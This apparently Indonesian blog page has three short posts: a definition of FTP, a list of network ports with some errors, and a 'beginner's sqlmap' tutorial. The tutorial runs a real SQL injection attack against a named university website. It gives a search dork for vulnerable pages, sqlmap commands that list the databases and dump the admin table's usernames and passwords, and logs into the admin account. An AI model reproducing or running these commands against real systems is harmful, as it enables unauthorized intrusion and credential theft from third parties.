Gudang Informatika

Pengertian FTP (File Transfer Protocol) dan kegunaannya - FTP adalah singkatan dari File Transfer Protocol, merupakan salah satu cara komunikasi antara komputer di dalam jaringan. Hal ini memungkinkan pengguna dapat saling mengirim file dari komputer satu ke komputer yang lain secara praktis.

Fungsi dan kegunaan dari ftp antara lain :

1. melakukan transfer data dua arah

2. melakukan transfer data berukuran besar

3. backup website dapat dilakukan dengan mudah

 

Macam macam port jaringan dan kegunaan port jaringan - Port dalam komputer memiliki 2 macam yaitu port fisik dan port login. Port fisik adalah port dalam komputer yang dapat dilihat dan dirasakan secara fisik. port ini memiliki fungsi utama yaitu menghubungkan dua atau lebih komponen yang nyata secara fisik, semisal komputer server dan komputer client. Sedangkan port login adalah port yang tidak dapat dilihat secara fisik, port ini memiliki fungsi yang sama yaitu menghubungkan antara perangkat lain, namun bedanya port ini menghubungkan melalui protokol.

Macam-macam port logic :

1. port 21 : digunakan untuk koneksi FTP

2. port 22 : digunakan untuk koneksi SSH

3. port 23 : digunakan untuk koneksi telnet

4. port 25 : digunakan untuk pengiriman email(SMTP)

5. port 2525 : alternative pengiriman email (SMTP)

6. port 110 : digunakan untuk pengiriman email menggunakan protokol POP3 atau Post Office Protocol maupun IMAP4 atau Internet Message Access Protocol

7. port 443 : digunakan untuk menjalankan sebuah server aman atau SSL

8. port 3306 : Biasanya digunakan untuk koneksi aplikasi MySql

9. port 80 : digunakan untuk koneksi web server

10. port 81 : alternative koneksi web server

 

 

Begini cara menggunakan sqlmap pemula  - Sqlmap merupakan tools untuk melakukan eksploitasi Sql Injection.

1. dorking sesuai dengan metode yang akan di gunakan. Disini saya akan menggunakan metode Sql injection. Dork : inurl:detail-dosen.php?id=

 

2. masuk web kemudian cek apakah vuln terhadap sql inject atau tidak.

  

- tes dengan karakter ‘ terdapat data yang hilang.

 

3. selanjutnya menggunakan sqlmap, command yang digunakan

(sqlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 –dbs) terdapat database yang ada di web tersebut.

4. mendapatkan data tabel di database matematika (qlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 -D matematika --tables)

5. mengambil data admin untuk login (sqlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 -D matematika -T admin -C username,password,level,blokir --dump)

6. setelah mendapatkan username dan password, selanjutnya login.

7. berhasil login.